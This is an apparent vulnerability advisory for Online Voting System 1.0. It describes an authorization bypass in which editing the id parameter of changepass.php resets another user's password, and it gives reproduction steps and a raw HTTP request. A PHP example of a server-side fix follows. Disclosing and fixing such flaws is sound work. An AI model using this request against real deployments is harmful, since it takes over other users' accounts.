Online Voting System 1.0 Authorization Bypass

Online Voting System version 1.0 suffers from an authorization bypass vulnerability that allows for the password change of other users.

## Steps to reproduce
# 1. Register an account (any user): http://TARGET/online_voting/registeracc.php
# 2. Login
# 3. Go to change password: http://TARGET/online_voting/changepass.php
# 4. Change the password and intercept the request with Burp Suite
# 5. Change the id parameter of the URL (id=7 to id=1) to another user's account; the password will be updated

POST /online_voting/changepass.php?id=7 HTTP/1.1
Host: TARGET
Content-Length: 55
Connection: close
Referer: http://localhost/online_voting/changepass.php?id=7
Cookie: PHPSESSID=t19ph5v0sem2pi0gaap55j08ei

oldpass=a&newpass=a&conpass=a&changepass=Update+Profile
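
A server-side check that closes the flaw shown in the request above, as an added example and not the application's own code: the account to update is taken from the authenticated session, and an `id` in the URL that names another account is refused. The `users` table, its columns, the `user_id` session key and the `change_password` function are assumptions, since the advisory does not show the source of changepass.php.

```php
<?php
// Added example; not the application's code. Table, column and session key
// names are assumptions, since the advisory does not show changepass.php.
declare(strict_types=1);

function change_password(PDO $db, array $session, array $query, array $post): string
{
    // The account to modify comes from the authenticated session only.
    if (!isset($session['user_id'])) {
        return 'not logged in';
    }
    $uid = (int) $session['user_id'];

    // A client-supplied id that names another account is refused, not trusted.
    if (isset($query['id']) && (int) $query['id'] !== $uid) {
        return 'forbidden';
    }
    if (($post['newpass'] ?? '') === '' || $post['newpass'] !== ($post['conpass'] ?? null)) {
        return 'confirmation mismatch';
    }

    $stmt = $db->prepare('SELECT password_hash FROM users WHERE id = ?');
    $stmt->execute([$uid]);
    $hash = $stmt->fetchColumn();
    // Require the current password of the session user before changing it.
    if ($hash === false || !password_verify($post['oldpass'] ?? '', $hash)) {
        return 'wrong current password';
    }

    $upd = $db->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
    $upd->execute([password_hash($post['newpass'], PASSWORD_DEFAULT), $uid]);
    return 'updated';
}

// Constructed demo data: in-memory SQLite with accounts 1 and 7.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users VALUES (?, ?)');
$ins->execute([1, password_hash('admin-secret', PASSWORD_DEFAULT)]);
$ins->execute([7, password_hash('a', PASSWORD_DEFAULT)]);

$post = ['oldpass' => 'a', 'newpass' => 'b', 'conpass' => 'b'];
// Session belongs to user 7; the URL id has been changed to 1.
echo change_password($db, ['user_id' => 7], ['id' => '1'], $post), "\n";
// Same session with its own id.
echo change_password($db, ['user_id' => 7], ['id' => '7'], $post), "\n";
```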